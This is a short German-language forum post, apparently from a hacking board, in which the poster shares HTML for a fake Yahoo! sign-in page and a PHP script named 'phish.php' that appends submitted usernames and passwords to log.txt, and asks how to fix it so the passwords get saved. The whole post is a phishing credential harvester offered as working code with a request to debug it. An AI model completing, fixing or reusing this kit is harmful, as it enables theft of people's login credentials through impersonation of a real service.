Was muss ich hier umändern das die PW's in Log.txt gespeichert werden?

Code:
<form id="form1" name="form1" method="post" action="">
    <div align="left"><span class="Stil5">Yahoo! ID:</span>

      <input type="text" name="textfield" id="textfield" />
      </label>
    </div>
  </form>
</div>
 <div id="apDiv2">
   <form id="form2" name="form2" method="post" action="">
     <label><span class="Stil5">Password:</span>

     <input type="text" name="textfield2" id="textfield2" />
     </label>
   </form>
</div>
 <div id="apDiv3">
   <input type="radio" name="radio" id="radio" value="radio" />
</div>
 <form id="form3" name="form3" method="post" action="">
   <label></label>
   <div id="apDiv4">
     <label>
     <input type="submit" name="button" id="button" value="Sign In" />
     </label>
   </div>
dies ist meine "phish.php" laut Jaro ist das ein falscher code.. mmhhh
Code:
<?php
$mail=$_POST['mail'];
$psw=$_POST['psw'];
$ausgabe=$mail.", ".$psw."\n";
$datei=fopen("log.txt","a");
$output=fwrite($datei,$ausgabe);
fclose($datei);
?>
LG
xREL